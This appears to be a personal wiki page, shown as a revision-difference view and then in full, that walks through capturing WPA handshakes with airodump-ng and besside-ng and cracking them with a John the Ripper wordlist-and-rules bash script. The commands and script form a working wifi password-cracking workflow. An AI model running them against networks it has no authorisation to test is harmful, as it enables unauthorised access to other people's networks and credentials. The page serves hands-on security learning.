Kali/Wireless Reboot: Difference between revisions
From charlesreid1
| Line 37: | Line 37: | ||
Once we have the handshakes, use instructions on [[John the Ripper/WPA]] page to turn those cap files into hccap files, then into John the Ripper password files. | Once we have the handshakes, use instructions on [[John the Ripper/WPA]] page to turn those cap files into hccap files, then into John the Ripper password files. | ||
{{Scrollbox| | |||
<pre> | <pre> | ||
$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap | $ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap | ||
| Line 153: | Line 154: | ||
done | done | ||
</pre> | </pre> | ||
}} | |||
Settle in, because we'll be here a while. | |||
=Flags= | =Flags= | ||
Revision as of 11:54, 18 August 2016
Reboot
Revisiting some of the old techniques.
Monitor wireless
First is aircrack to monitor wifi networks.
Start by putting the wifi card in monitor mode:
$ ifconfig wlan1 down; iwconfig wlan1 mode monitor; ifconfig wlan1 up
Now you can use that interface to scan for wireless network activity:
$ airodump-ng -i wlan1 -w output_file
This will output information about wireless network activity to a file.
Obtain handshakes
You can use aircrack to monitor wireless activity and verify that there are, in fact, clients connected to networks - a critical component in obtaining handshakes. The next step is to use besside-ng to obtain handshakes the Joe Pesci way.
Specify -W for wpa only, and specify your network interface:
$ besside-ng -W wlan1
That will put handshakes in a cap file, and the name of networks whose handshakes were obtained in a log file.
Crack handshakes
Once we have the handshakes, use instructions on John the Ripper/WPA page to turn those cap files into hccap files, then into John the Ripper password files.
$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap $ hccap2john ./wpa.hccap > booty.johnpw Now the goal is to crack booty.johnpw with John the Ripper. To do this, we will need to try a variety of wordlists, and a variety of rulesets to modify the words in the wordlists. To do that, use a bash script: #!/bin/sh
# seclist passwords located in
# ~/codes/SecLists/Passwords
#
johndir="/usr/sbin"
johnbin="${johndir}/john"
cap="wpa.cap"
pwdir="/root/box/08_besside"
# Round 0
rulesets=("")
#### Round 1
###rulesets=("KoreLogicRulesAppendYears")
#### Round 2
###rulesets=("KoreLogicRulesAppendYears"
###"KoreLogicRulesAppendNum"
###"KoreLogicRulesPrependNum"
###"KoreLogicRulesAppendNumNum"
###"KoreLogicRulesPrependNumNum"
###"KoreLogicRulesPrependYears"
###)
# a good selection of seclist passwords:
# phpbb.txt
# elitehacker.txt
# alleged-gmail-passwords.txt
# Sucuri_Top_Wordpress_Passwords.txt
# korelogic-password.txt
# hak5.txt
# rockyou.txt
wordlists=("/root/codes/SecLists/Passwords/phpbb.txt"
"/root/codes/SecLists/Passwords/elitehacker.txt"
"/root/codes/SecLists/Passwords/alleged-gmail-passwords.txt"
"/root/codes/SecLists/Passwords/Sucuri_Top_Wordpress_Passwords.txt"
"/root/codes/SecLists/Passwords/korelogic-password.txt"
"/root/codes/SecLists/Passwords/hak5.txt"
"/root/codes/SecLists/Passwords/rockyou.txt")
# ===========================
# The Actual Work
for pwfile in `/bin/ls -1 ${pwdir}/*.johnpw`;
do
echo ""
echo ""
echo "*** * * ** **** * ***** ** ** * * * ** ****"
echo "* ** * *** **** *** * ** ** *** * * * *** *"
echo " * ***** * * * * *** * * * * * *** * * *"
echo "* * * * * * *** **** * *** * * * * * * *** *"
echo ""
echo ""
echo "Now on password file ${pwfile}"
echo ""
for rules in "${rulesets[@]}";
do
echo ""
echo ""
echo " .. . .. . .... ... . . ... .. . .. . . . ."
echo "... ... .. ...... . .. . . . .... .... ."
echo "... . .. . . . .. .... . . . . . ... . "
echo ""
echo ""
echo "Now on ruleset file ${rules}"
echo ""
for wordlist in "${wordlists[@]}";
do
echo ""
echo "---------------------------"
echo "Running John the Ripper with options:"
echo "Wordlist: ${wordlist}"
echo "Ruleset: ${rules}"
echo "Password File: ${pwfile}"
if [ "${rules}" == "" ] ; then
# test it out first
echo "${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}"
# actually do it
mypwd=`pwd`
cd ${johndir}
${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}
cd ${mypwd}
else
# test it out first
echo "${johnbin} --wordlist=${wordlist} --format=wpapsk --rules=${rules} ${pwfile}"
# actually do it
mypwd=`pwd`
cd ${johndir}
${johnbin} --rules=${rules} --wordlist=${wordlist} --format=wpapsk ${pwfile}
cd ${mypwd}
fi
done
done
done
|
Settle in, because we'll be here a while.
Flags
 |
Wireless all things wireless.
Software:
|
|
aircrack-ng a suite of tools for wireless cracking.
aircrack-ng Many Ways to Crack a Wifi: Cracking Wifi Aircrack Benchmarking: Aircrack/Benchmarking WEP Attacks with Aircrack: Aircrack/WEP Cracking WPA Attacks with Aircrack: Aircrack/WPA Cracking Aircrack Hardware: Aircrack/Packet Injection Testing Harvesting Wireless Network Information
airodump-ng Basic Usage of Airodump
Category:Security · Category:Wireless · Category:Passwords
|